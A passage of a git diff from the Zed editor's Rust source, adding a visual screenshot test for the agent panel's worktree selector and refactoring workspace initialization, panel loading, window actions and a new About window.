+ let _workspace_observer = cx.update(|cx| { + cx.observe_new(move |workspace: &mut Workspace, window, cx| { + let Some(window) = window else { return }; + let panels_task = cx.spawn_in(window, async move |workspace_handle, cx| { + let project_panel = ProjectPanel::load(workspace_handle.clone(), cx.clone()); + let agent_panel = AgentPanel::load(workspace_handle.clone(), cx.clone()); + if let Ok(panel) = project_panel.await { + workspace_handle + .update_in(cx, |workspace, window, cx| { + workspace.add_panel(panel, window, cx); + }) + .log_err(); + } + if let Ok(panel) = agent_panel.await { + workspace_handle + .update_in(cx, |workspace, window, cx| { + workspace.add_panel(panel, window, cx); + }) + .log_err(); + } + anyhow::Ok(()) + }); + workspace.set_panels_task(panels_task); + }) + }); + + cx.background_executor.allow_parking(); + let panel = cx + .foreground_executor + .block_test(AgentPanel::load(weak_workspace, async_window_cx)) + .context("Failed to load AgentPanel")?; + cx.background_executor.forbid_parking(); + + workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + workspace.add_panel(panel.clone(), window, cx); + workspace.open_panel::(window, cx); + }); + }) + .context("Failed to add and open AgentPanel")?; + + cx.run_until_parked(); + + // Inject the stub server and open a thread so the toolbar is visible + let connection = StubAgentConnection::new(); + let stub_agent: Rc = Rc::new(StubAgentServer::new(connection)); + + cx.update_window(workspace_window.into(), |_, window, cx| { + panel.update(cx, |panel, cx| { + panel.open_external_thread_with_server(stub_agent.clone(), window, cx); + }); + })?; + + cx.run_until_parked(); + + // ---- Screenshot 1: Default "Local Project" selector (dropdown closed) ---- + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_default 
= run_visual_test( + "start_thread_in_selector_default", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 2: Dropdown open showing menu entries ---- + cx.update_window(workspace_window.into(), |_, window, cx| { + panel.update(cx, |panel, cx| { + panel.open_start_thread_in_menu_for_tests(window, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_open_dropdown = run_visual_test( + "start_thread_in_selector_open", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 3: "New Worktree" selected (dropdown closed, label changed) ---- + // First dismiss the dropdown, then change the target so the toolbar label is visible + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.close_start_thread_in_menu_for_tests(cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_start_thread_in_for_tests(StartThreadIn::NewWorktree, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_new_worktree = run_visual_test( + "start_thread_in_selector_new_worktree", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 4: "Creating worktree…" status banner ---- + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel + .set_worktree_creation_status_for_tests(Some(WorktreeCreationStatus::Creating), cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_creating = run_visual_test( + "worktree_creation_status_creating", + workspace_window.into(), + cx, + 
update_baseline, + ); + + // ---- Screenshot 5: Error status banner ---- + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_worktree_creation_status_for_tests( + Some(WorktreeCreationStatus::Error( + "Failed to create worktree: branch already exists".into(), + )), + cx, + ); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_error = run_visual_test( + "worktree_creation_status_error", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 6: Worktree creation succeeded ---- + // Clear the error status and re-select New Worktree to ensure a clean state. + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_worktree_creation_status_for_tests(None, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, cx| { + window.dispatch_action(Box::new(StartThreadIn::NewWorktree), cx); + })?; + cx.run_until_parked(); + + // Insert a message into the active thread's message editor and submit. + let thread_view = cx + .read(|cx| panel.read(cx).active_thread_view(cx)) + .ok_or_else(|| anyhow::anyhow!("No active thread view"))?; + + cx.update_window(workspace_window.into(), |_, window, cx| { + let message_editor = thread_view.read(cx).message_editor.clone(); + message_editor.update(cx, |message_editor, cx| { + message_editor.set_message( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "Add a CLI flag to set the log level".to_string(), + ))], + window, + cx, + ); + message_editor.send(cx); + }); + })?; + cx.run_until_parked(); + + // Wait for the full worktree creation flow to complete. The creation status + // is cleared to `None` at the very end of the async task, after panels are + // loaded, the agent panel is focused, and the new workspace is activated. 
+ cx.background_executor.allow_parking(); + let mut creation_complete = false; + for _ in 0..120 { + cx.run_until_parked(); + let status_cleared = cx.read(|cx| { + panel + .read(cx) + .worktree_creation_status_for_tests() + .is_none() + }); + let workspace_count = workspace_window.update(cx, |multi_workspace, _window, _cx| { + multi_workspace.workspaces().count() + })?; + if workspace_count == 2 && status_cleared { + creation_complete = true; + break; + } + cx.advance_clock(Duration::from_millis(100)); + } + cx.background_executor.forbid_parking(); + + if !creation_complete { + return Err(anyhow::anyhow!("Worktree creation did not complete")); + } + + // The creation flow called `external_thread` on the new workspace's agent + // panel, which tried to launch a real agent binary and failed. Replace the + // error state by injecting the stub server, and shrink the panel so the + // editor content is visible. + workspace_window.update(cx, |multi_workspace, window, cx| { + let new_workspace = multi_workspace.workspaces().nth(1).unwrap(); + new_workspace.update(cx, |workspace, cx| { + if let Some(new_panel) = workspace.panel::(cx) { + new_panel.update(cx, |panel, cx| { + panel.open_external_thread_with_server(stub_agent.clone(), window, cx); + }); + } + }); + })?; + cx.run_until_parked(); + + // Type and send a message so the thread target dropdown disappears. 
+ let new_panel = workspace_window.update(cx, |multi_workspace, _window, cx| { + let new_workspace = multi_workspace.workspaces().nth(1).unwrap(); + new_workspace.read(cx).panel::(cx) + })?; + if let Some(new_panel) = new_panel { + let new_thread_view = cx.read(|cx| new_panel.read(cx).active_thread_view(cx)); + if let Some(new_thread_view) = new_thread_view { + cx.update_window(workspace_window.into(), |_, window, cx| { + let message_editor = new_thread_view.read(cx).message_editor.clone(); + message_editor.update(cx, |editor, cx| { + editor.set_message( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "Add a CLI flag to set the log level".to_string(), + ))], + window, + cx, + ); + editor.send(cx); + }); + })?; + cx.run_until_parked(); + } + } + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_succeeded = run_visual_test( + "worktree_creation_succeeded", + workspace_window.into(), + cx, + update_baseline, + ); + + // Clean up — drop the workspace observer first so no new panels are + // registered on workspaces created during teardown. + drop(_workspace_observer); + + workspace_window + .update(cx, |multi_workspace, _window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + let worktree_ids: Vec<_> = + project.worktrees(cx).map(|wt| wt.read(cx).id()).collect(); + for id in worktree_ids { + project.remove_worktree(id, cx); + } + }); + }) + .log_err(); + + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.remove_window(); + }) + .log_err(); + + cx.run_until_parked(); + + for _ in 0..15 { + cx.advance_clock(Duration::from_millis(100)); + cx.run_until_parked(); + } + + // Delete the preserved temp directory so visual-test runs don't + // accumulate filesystem artifacts. 
+ if let Err(err) = std::fs::remove_dir_all(&temp_path) { + log::warn!( + "failed to clean up visual-test temp dir {}: {err}", + temp_path.display() + ); + } + + // Reset feature flags + cx.update(|cx| { + cx.update_flags(false, vec![]); + }); + + let results = [ + ("default", result_default), + ("open_dropdown", result_open_dropdown), + ("new_worktree", result_new_worktree), + ("creating", result_creating), + ("error", result_error), + ("succeeded", result_succeeded), + ]; + + let mut has_baseline_update = None; + let mut failures = Vec::new(); + + for (name, result) in &results { + match result { + Ok(TestResult::Passed) => {} + Ok(TestResult::BaselineUpdated(p)) => { + has_baseline_update = Some(p.clone()); + } + Err(e) => { + failures.push(format!("{}: {}", name, e)); + } + } + } + + if !failures.is_empty() { + Err(anyhow::anyhow!( + "start_thread_in_selector failures: {}", + failures.join("; ") + )) + } else if let Some(p) = has_baseline_update { + Ok(TestResult::BaselineUpdated(p)) + } else { + Ok(TestResult::Passed) + } +} diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index bbbce4986607aa5b64453e8bceb61375a49a7122..03e128415e1aa8390d1b95816755d3644064dada 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -13,11 +13,11 @@ pub mod visual_tests; #[cfg(target_os = "windows")] pub(crate) mod windows_only_instance; -use agent_ui::{AgentDiffToolbar, AgentPanelDelegate}; +use agent_ui::AgentDiffToolbar; use anyhow::Context as _; pub use app_menus::*; use assets::Assets; -use audio::{AudioSettings, REPLAY_DURATION}; + use breadcrumbs::Breadcrumbs; use client::zed_urls; use collections::VecDeque; @@ -33,10 +33,11 @@ use git_ui::commit_view::CommitViewToolbar; use git_ui::git_panel::GitPanel; use git_ui::project_diff::{BranchDiffToolbar, ProjectDiffToolbar}; use gpui::{ - Action, App, AppContext as _, AsyncWindowContext, Context, DismissEvent, Element, Entity, - Focusable, KeyBinding, ParentElement, PathPromptOptions, PromptLevel, 
ReadGlobal, SharedString, - Task, TitlebarOptions, UpdateGlobal, WeakEntity, Window, WindowHandle, WindowKind, - WindowOptions, actions, image_cache, point, px, retain_all, + Action, App, AppContext as _, AsyncWindowContext, ClipboardItem, Context, DismissEvent, + Element, Entity, FocusHandle, Focusable, Image, ImageFormat, KeyBinding, ParentElement, + PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TitlebarOptions, + UpdateGlobal, WeakEntity, Window, WindowBounds, WindowHandle, WindowKind, WindowOptions, + actions, image_cache, img, point, px, retain_all, }; use image_viewer::ImageInfo; use language::Capability; @@ -56,7 +57,6 @@ use paths::{ }; use project::{DirectoryLister, DisableAiSettings, ProjectItem}; use project_panel::ProjectPanel; -use prompt_store::PromptBuilder; use quick_action_bar::QuickActionBar; use recent_projects::open_remote_project; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; @@ -69,7 +69,7 @@ use settings::{ update_settings_file, }; use sidebar::Sidebar; -use std::time::Duration; + use std::{ borrow::Cow, path::{Path, PathBuf}, @@ -77,16 +77,15 @@ use std::{ sync::atomic::{self, AtomicBool}, }; use terminal_view::terminal_panel::{self, TerminalPanel}; -use theme::{ActiveTheme, GlobalTheme, SystemAppearance, ThemeRegistry, ThemeSettings}; -use ui::{PopoverMenuHandle, prelude::*}; +use theme::{ActiveTheme, SystemAppearance, ThemeRegistry, deserialize_icon_theme}; +use theme_settings::{ThemeSettings, load_user_theme}; +use ui::{Navigable, NavigableEntry, PopoverMenuHandle, TintColor, prelude::*}; use util::markdown::MarkdownString; use util::rel_path::RelPath; use util::{ResultExt, asset_str, maybe}; use uuid::Uuid; use vim_mode_setting::VimModeSetting; -use workspace::notifications::{ - NotificationId, SuppressEvent, dismiss_app_notification, show_app_notification, -}; +use workspace::notifications::{NotificationId, dismiss_app_notification, show_app_notification}; use workspace::{ AppState, 
MultiWorkspace, NewFile, NewWindow, OpenLog, Panel, Toast, Workspace, @@ -94,13 +93,12 @@ use workspace::{ notifications::simple_message_notification::MessageNotification, open_new, }; use workspace::{ - CloseIntent, CloseProject, CloseWindow, NotificationFrame, RestoreBanner, - with_active_or_new_workspace, + CloseIntent, CloseProject, CloseWindow, RestoreBanner, with_active_or_new_workspace, }; use workspace::{Pane, notifications::DetachAndPromptErr}; use zed_actions::{ - OpenAccountSettings, OpenBrowser, OpenDocs, OpenServerSettings, OpenSettingsFile, OpenZedUrl, - Quit, + About, OpenAccountSettings, OpenBrowser, OpenDocs, OpenServerSettings, OpenSettingsFile, + OpenZedUrl, Quit, }; actions!( @@ -144,10 +142,6 @@ actions!( actions!( dev, [ - /// Stores last 30s of audio from zed staff using the experimental rodio - /// audio system (including yourself) on the current call in a tar file - /// in the current working directory. - CaptureRecentAudio, /// Opens a prompt to enter a URL to open. 
OpenUrlPrompt, ] @@ -163,21 +157,24 @@ pub fn init(cx: &mut App) { cx.on_action(quit); cx.on_action(|_: &RestoreBanner, cx| title_bar::restore_banner(cx)); - let flag = cx.wait_for_flag::(); - cx.spawn(async |cx| { - if cx.update(|cx| ReleaseChannel::global(cx) == ReleaseChannel::Dev) || flag.await { - cx.update(|cx| { - cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action")) - .on_action(|_: &TestCrash, _| { - unsafe extern "C" { - fn puts(s: *const i8); - } - unsafe { - puts(0xabad1d3a as *const i8); - } - }); - }); - }; + + cx.observe_flag::({ + let mut added = false; + move |enabled, cx| { + if added || !enabled { + return; + } + added = true; + cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action")) + .on_action(|_: &TestCrash, _| { + unsafe extern "C" { + fn puts(s: *const i8); + } + unsafe { + puts(0xabad1d3a as *const i8); + } + }); + } }) .detach(); cx.on_action(|_: &OpenLog, cx| { @@ -281,10 +278,8 @@ pub fn init(cx: &mut App) { ); }); }) - .on_action(|_: &zed_actions::About, cx| { - with_active_or_new_workspace(cx, |workspace, window, cx| { - about(workspace, window, cx); - }); + .on_action(|_: &About, cx| { + open_about_window(cx); }); } @@ -295,7 +290,7 @@ fn bind_on_window_closed(cx: &mut App) -> Option { .on_last_window_closed .is_quit_app() .then(|| { - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } @@ -304,7 +299,7 @@ fn bind_on_window_closed(cx: &mut App) -> Option { } #[cfg(not(target_os = "macos"))] { - Some(cx.on_window_closed(|cx| { + Some(cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } @@ -358,11 +353,7 @@ pub fn build_window_options(display_uuid: Option, cx: &mut App) -> WindowO } } -pub fn initialize_workspace( - app_state: Arc, - prompt_builder: Arc, - cx: &mut App, -) { +pub fn initialize_workspace(app_state: Arc, cx: &mut App) { let mut _on_close_subscription = bind_on_window_closed(cx); cx.observe_global::(move |cx| { 
// A 1.92 regression causes unused-assignment to trigger on this variable. @@ -371,15 +362,39 @@ pub fn initialize_workspace( }) .detach(); - cx.observe_new(|multi_workspace: &mut MultiWorkspace, window, cx| { + cx.observe_new(|_multi_workspace: &mut MultiWorkspace, window, cx| { let Some(window) = window else { return; }; - let multi_workspace_handle = cx.entity(); - let sidebar = cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx)); - multi_workspace.register_sidebar(sidebar, window, cx); - let multi_workspace_handle = multi_workspace_handle.downgrade(); + #[cfg(feature = "track-project-leak")] + { + let multi_workspace_handle = cx.weak_entity(); + let workspace_handle = _multi_workspace.workspace().downgrade(); + let project_handle = _multi_workspace.workspace().read(cx).project().downgrade(); + let window_id_2 = window.window_handle().window_id(); + cx.on_window_closed(move |cx, window_id| { + let multi_workspace_handle = multi_workspace_handle.clone(); + let workspace_handle = workspace_handle.clone(); + let project_handle = project_handle.clone(); + if window_id != window_id_2 { + return; + } + cx.spawn(async move |cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(1500)) + .await; + + multi_workspace_handle.assert_released(); + workspace_handle.assert_released(); + project_handle.assert_released(); + }) + .detach(); + }) + .detach(); + } + + let multi_workspace_handle = cx.entity().downgrade(); window.on_window_should_close(cx, move |window, cx| { multi_workspace_handle .update(cx, |multi_workspace, cx| { @@ -389,6 +404,20 @@ pub fn initialize_workspace( }) .unwrap_or(true) }); + + let window_handle = window.window_handle(); + let multi_workspace_handle = cx.entity(); + cx.defer(move |cx| { + window_handle + .update(cx, |_, window, cx| { + let sidebar = + cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx)); + multi_workspace_handle.update(cx, |multi_workspace, cx| { + 
multi_workspace.register_sidebar(sidebar, cx); + }); + }) + .ok(); + }); }) .detach(); @@ -422,16 +451,7 @@ pub fn initialize_workspace( if let Some(specs) = window.gpu_specs() { log::info!("Using GPU: {:?}", specs); show_software_emulation_warning_if_needed(specs.clone(), window, cx); - if let Some((crash_server, message)) = crashes::CRASH_HANDLER - .get() - .zip(bincode::serialize(&specs).ok()) - && let Err(err) = crash_server.send_message(3, message) - { - log::warn!( - "Failed to store active gpu info for crash reporting: {}", - err - ); - } + crashes::set_gpu_info(specs); } let edit_prediction_menu_handle = PopoverMenuHandle::default(); @@ -453,6 +473,7 @@ pub fn initialize_workspace( let search_button = cx.new(|_| search::search_status_button::SearchButton::new()); let diagnostic_summary = cx.new(|cx| diagnostics::items::DiagnosticIndicator::new(workspace, cx)); + let active_file_name = cx.new(|_| workspace::active_file_name::ActiveFileName::new()); let activity_indicator = activity_indicator::ActivityIndicator::new( workspace, workspace.project().read(cx).languages().clone(), @@ -481,11 +502,15 @@ pub fn initialize_workspace( cx.new(|_| go_to_line::cursor_position::CursorPosition::new(workspace)); let line_ending_indicator = cx.new(|_| line_ending_selector::LineEndingIndicator::default()); + let merge_conflict_indicator = + cx.new(|cx| git_ui::MergeConflictIndicator::new(workspace, cx)); workspace.status_bar().update(cx, |status_bar, cx| { status_bar.add_left_item(search_button, window, cx); status_bar.add_left_item(lsp_button, window, cx); status_bar.add_left_item(diagnostic_summary, window, cx); + status_bar.add_left_item(active_file_name, window, cx); status_bar.add_left_item(activity_indicator, window, cx); + status_bar.add_left_item(merge_conflict_indicator, window, cx); status_bar.add_right_item(edit_prediction_ui, window, cx); status_bar.add_right_item(active_buffer_encoding, window, cx); status_bar.add_right_item(active_buffer_language, window, cx); 
@@ -496,10 +521,13 @@ pub fn initialize_workspace( status_bar.add_right_item(image_info, window, cx); }); - initialize_panels(prompt_builder.clone(), window, cx); + let panels_task = initialize_panels(window, cx); + workspace.set_panels_task(panels_task); register_actions(app_state.clone(), workspace, window, cx); - workspace.focus_handle(cx).focus(window, cx); + if !workspace.has_active_modal(window, cx) { + workspace.focus_handle(cx).focus(window, cx); + } }) .detach(); } @@ -616,11 +644,7 @@ fn show_software_emulation_warning_if_needed( } } -fn initialize_panels( - prompt_builder: Arc, - window: &mut Window, - cx: &mut Context, -) { +fn initialize_panels(window: &mut Window, cx: &mut Context) -> Task> { cx.spawn_in(window, async move |workspace_handle, cx| { let project_panel = ProjectPanel::load(workspace_handle.clone(), cx.clone()); let outline_panel = OutlinePanel::load(workspace_handle.clone(), cx.clone()); @@ -657,12 +681,11 @@ fn initialize_panels( add_panel_when_ready(channels_panel, workspace_handle.clone(), cx.clone()), add_panel_when_ready(notification_panel, workspace_handle.clone(), cx.clone()), add_panel_when_ready(debug_panel, workspace_handle.clone(), cx.clone()), - initialize_agent_panel(workspace_handle, prompt_builder, cx.clone()).map(|r| r.log_err()), + initialize_agent_panel(workspace_handle, cx.clone()).map(|r| r.log_err()), ); anyhow::Ok(()) }) - .detach(); } fn setup_or_teardown_ai_panel( @@ -703,24 +726,20 @@ fn setup_or_teardown_ai_panel( async fn initialize_agent_panel( workspace_handle: WeakEntity, - prompt_builder: Arc, mut cx: AsyncWindowContext, ) -> anyhow::Result<()> { workspace_handle .update_in(&mut cx, |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); setup_or_teardown_ai_panel(workspace, window, cx, move |workspace, cx| { - agent_ui::AgentPanel::load(workspace, prompt_builder, cx) + agent_ui::AgentPanel::load(workspace, cx) }) })? 
.await?; workspace_handle.update_in(&mut cx, |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); cx.observe_global_in::(window, move |workspace, window, cx| { - let prompt_builder = prompt_builder.clone(); setup_or_teardown_ai_panel(workspace, window, cx, move |workspace, cx| { - agent_ui::AgentPanel::load(workspace, prompt_builder, cx) + agent_ui::AgentPanel::load(workspace, cx) }) .detach_and_log_err(cx); }) @@ -733,11 +752,6 @@ async fn initialize_agent_panel( // // Once we ship `assistant2` we can push this back down into `agent::agent_panel::init`. if !cfg!(test) { - ::set_global( - Arc::new(agent_ui::ConcreteAssistantPanelDelegate), - cx, - ); - workspace .register_action(agent_ui::AgentPanel::toggle_focus) .register_action(agent_ui::AgentPanel::toggle) @@ -794,7 +808,7 @@ fn register_actions( } } }) - .register_action(|workspace, _: &workspace::Open, window, cx| { + .register_action(|workspace, action: &workspace::Open, window, cx| { telemetry::event!("Project Opened"); workspace::prompt_for_open_path_and_open( workspace, @@ -805,6 +819,7 @@ fn register_actions( multiple: true, prompt: None, }, + action.create_new_window, window, cx, ); @@ -820,6 +835,7 @@ fn register_actions( multiple: true, prompt: None, }, + true, window, cx, ); @@ -869,10 +885,10 @@ fn register_actions( let _ = settings .theme .ui_font_size - .insert(f32::from(theme::clamp_font_size(ui_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(ui_font_size)).into()); }); } else { - theme::adjust_ui_font_size(cx, |size| size + px(1.0)); + theme_settings::adjust_ui_font_size(cx, |size| size + px(1.0)); } } }) @@ -885,10 +901,10 @@ fn register_actions( let _ = settings .theme .ui_font_size - .insert(f32::from(theme::clamp_font_size(ui_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(ui_font_size)).into()); }); } else { - theme::adjust_ui_font_size(cx, |size| size - px(1.0)); + theme_settings::adjust_ui_font_size(cx, |size| size - 
px(1.0)); } } }) @@ -900,7 +916,7 @@ fn register_actions( settings.theme.ui_font_size = None; }); } else { - theme::reset_ui_font_size(cx); + theme_settings::reset_ui_font_size(cx); } } }) @@ -914,10 +930,10 @@ fn register_actions( let _ = settings .theme .buffer_font_size - .insert(f32::from(theme::clamp_font_size(buffer_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(buffer_font_size)).into()); }); } else { - theme::adjust_buffer_font_size(cx, |size| size + px(1.0)); + theme_settings::adjust_buffer_font_size(cx, |size| size + px(1.0)); } } }) @@ -931,10 +947,10 @@ fn register_actions( let _ = settings .theme .buffer_font_size - .insert(f32::from(theme::clamp_font_size(buffer_font_size)).into()); + .insert(f32::from(theme_settings::clamp_font_size(buffer_font_size)).into()); }); } else { - theme::adjust_buffer_font_size(cx, |size| size - px(1.0)); + theme_settings::adjust_buffer_font_size(cx, |size| size - px(1.0)); } } }) @@ -946,7 +962,7 @@ fn register_actions( settings.theme.buffer_font_size = None; }); } else { - theme::reset_buffer_font_size(cx); + theme_settings::reset_buffer_font_size(cx); } } }) @@ -961,10 +977,10 @@ fn register_actions( settings.theme.agent_buffer_font_size = None; }); } else { - theme::reset_ui_font_size(cx); - theme::reset_buffer_font_size(cx); - theme::reset_agent_ui_font_size(cx); - theme::reset_agent_buffer_font_size(cx); + theme_settings::reset_ui_font_size(cx); + theme_settings::reset_buffer_font_size(cx); + theme_settings::reset_agent_ui_font_size(cx); + theme_settings::reset_agent_buffer_font_size(cx); } } }) @@ -1040,91 +1056,100 @@ fn register_actions( }, ) .register_action({ - let app_state = Arc::downgrade(&app_state); + let app_state = app_state.clone(); move |_, _: &NewWindow, _, cx| { - if let Some(app_state) = app_state.upgrade() { - open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - // Create buffer synchronously to avoid flicker - let project = 
workspace.project().clone(); - let buffer = project.update(cx, |project, cx| { - project.create_local_buffer("", None, true, cx) - }); - let editor = cx.new(|cx| { - Editor::for_buffer(buffer, Some(project), window, cx) - }); - workspace.add_item_to_active_pane( - Box::new(editor), - None, - true, - window, - cx, - ); - }, - ) - .detach(); - } + open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + cx.activate(true); + // Create buffer synchronously to avoid flicker + let project = workspace.project().clone(); + let buffer = project.update(cx, |project, cx| { + project.create_local_buffer("", None, true, cx) + }); + let editor = cx.new(|cx| { + Editor::for_buffer(buffer, Some(project), window, cx) + }); + workspace.add_item_to_active_pane( + Box::new(editor), + None, + true, + window, + cx, + ); + }, + ) + .detach(); } }) .register_action({ - let app_state = Arc::downgrade(&app_state); - move |_, _: &CloseProject, window, cx| { + let app_state = app_state.clone(); + move |_workspace, _: &CloseProject, window, cx| { let Some(window_handle) = window.window_handle().downcast::() else { return; }; - if let Some(app_state) = app_state.upgrade() { - open_new( - workspace::OpenOptions { - replace_window: Some(window_handle), - ..Default::default() - }, - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - // Create buffer synchronously to avoid flicker - let project = workspace.project().clone(); - let buffer = project.update(cx, |project, cx| { - project.create_local_buffer("", None, true, cx) - }); - let editor = cx.new(|cx| { - Editor::for_buffer(buffer, Some(project), window, cx) - }); - workspace.add_item_to_active_pane( - Box::new(editor), - None, - true, + let app_state = app_state.clone(); + cx.spawn_in(window, async move |this, cx| { + let should_continue = this + .update_in(cx, |workspace, window, cx| { + workspace.prepare_to_close( + CloseIntent::ReplaceWindow, window, cx, - ); - }, - ) - .detach(); - } + ) + 
})? + .await?; + if should_continue { + let task = cx.update(|_window, cx| { + open_new( + workspace::OpenOptions { + requesting_window: Some(window_handle), + ..Default::default() + }, + app_state, + cx, + |workspace, window, cx| { + cx.activate(true); + let project = workspace.project().clone(); + let buffer = project.update(cx, |project, cx| { + project.create_local_buffer("", None, true, cx) + }); + let editor = cx.new(|cx| { + Editor::for_buffer(buffer, Some(project), window, cx) + }); + workspace.add_item_to_active_pane( + Box::new(editor), + None, + true, + window, + cx, + ); + }, + ) + })?; + task.await + } else { + Ok(()) + } + }) + .detach_and_log_err(cx); } }) .register_action({ - let app_state = Arc::downgrade(&app_state); + let app_state = app_state.clone(); move |_, _: &NewFile, _, cx| { - if let Some(app_state) = app_state.upgrade() { - open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach_and_log_err(cx); - } + open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach_and_log_err(cx); } - }) - .register_action(|workspace, _: &CaptureRecentAudio, window, cx| { - capture_recent_audio(workspace, window, cx); }); #[cfg(not(target_os = "windows"))] @@ -1161,6 +1186,8 @@ fn register_actions( } }); } + + workspace.register_action(sidebar::dump_workspace_info); } fn initialize_pane( @@ -1224,44 +1251,218 @@ fn initialize_pane( }); } -fn about(_: &mut Workspace, window: &mut Window, cx: &mut Context) { - use std::fmt::Write; - let release_channel = ReleaseChannel::global(cx).display_name(); - let full_version = AppVersion::global(cx); - let version = env!("CARGO_PKG_VERSION"); - let debug = if cfg!(debug_assertions) { - "(debug)" - } else { - "" - }; - let message = format!("{release_channel} {version} {debug}"); +fn open_about_window(cx: &mut 
App) { + fn about_window_icon(release_channel: ReleaseChannel) -> Arc { + let bytes = match release_channel { + ReleaseChannel::Dev => include_bytes!("../resources/app-icon-dev.png").as_slice(), + ReleaseChannel::Nightly => { + include_bytes!("../resources/app-icon-nightly.png").as_slice() + } + ReleaseChannel::Preview => { + include_bytes!("../resources/app-icon-preview.png").as_slice() + } + ReleaseChannel::Stable => include_bytes!("../resources/app-icon.png").as_slice(), + }; - let mut detail = AppCommitSha::try_global(cx) - .map(|sha| sha.full()) - .unwrap_or_default(); - if !detail.is_empty() { - detail.push('\n'); + Arc::new(Image::from_bytes(ImageFormat::Png, bytes.to_vec())) } - _ = write!(&mut detail, "\n{full_version}"); - let detail = Some(detail); + struct AboutWindow { + focus_handle: FocusHandle, + ok_entry: NavigableEntry, + copy_entry: NavigableEntry, + app_icon: Arc, + message: SharedString, + commit: Option, + full_version: SharedString, + } - let prompt = window.prompt( - PromptLevel::Info, - &message, - detail.as_deref(), - &["Copy", "OK"], - cx, - ); - cx.spawn(async move |_, cx| { - if let Ok(0) = prompt.await { - let content = format!("{}\n{}", message, detail.as_deref().unwrap_or("")); - cx.update(|cx| { - cx.write_to_clipboard(gpui::ClipboardItem::new_string(content)); - }); + impl AboutWindow { + fn new(cx: &mut Context) -> Self { + let release_channel = ReleaseChannel::global(cx); + let release_channel_name = release_channel.display_name(); + let full_version: SharedString = AppVersion::global(cx).to_string().into(); + let version = env!("CARGO_PKG_VERSION"); + + let debug = if cfg!(debug_assertions) { + "(debug)" + } else { + "" + }; + let message: SharedString = format!("{release_channel_name} {version} {debug}").into(); + let commit = AppCommitSha::try_global(cx) + .map(|sha| sha.full()) + .filter(|commit| !commit.is_empty()) + .map(SharedString::from); + + Self { + focus_handle: cx.focus_handle(), + ok_entry: 
NavigableEntry::focusable(cx), + copy_entry: NavigableEntry::focusable(cx), + app_icon: about_window_icon(release_channel), + message, + commit, + full_version, + } } - }) - .detach(); + + fn copy_details(&self, window: &mut Window, cx: &mut Context) { + let content = match self.commit.as_ref() { + Some(commit) => { + format!( + "{}\nCommit: {}\nVersion: {}", + self.message, commit, self.full_version + ) + } + None => format!("{}\nVersion: {}", self.message, self.full_version), + }; + cx.write_to_clipboard(ClipboardItem::new_string(content)); + window.remove_window(); + } + } + + impl Render for AboutWindow { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let ok_is_focused = self.ok_entry.focus_handle.contains_focused(window, cx); + let copy_is_focused = self.copy_entry.focus_handle.contains_focused(window, cx); + + Navigable::new( + v_flex() + .id("about-window") + .track_focus(&self.focus_handle) + .on_action(cx.listener(|_, _: &menu::Cancel, window, _cx| { + window.remove_window(); + })) + .min_w_0() + .size_full() + .bg(cx.theme().colors().editor_background) + .text_color(cx.theme().colors().text) + .p_4() + 